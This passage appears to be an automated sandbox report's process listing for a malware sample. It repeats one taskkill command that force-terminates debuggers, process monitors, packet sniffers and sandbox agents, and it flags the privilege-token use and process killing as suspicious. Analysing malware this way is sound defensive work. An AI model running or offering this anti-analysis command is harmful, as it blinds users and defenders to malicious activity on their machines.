C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4756
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:1876
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:1924
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:2204
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:3040
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:2412
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:3944
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:4444
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:4336
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:1936
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:3028
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:3328
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:4904
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:2304
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:4804
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:2320
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:2532
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:2808
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵
- Kills process with taskkill
PID:2144
-
-
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe6⤵PID:4972
-
-
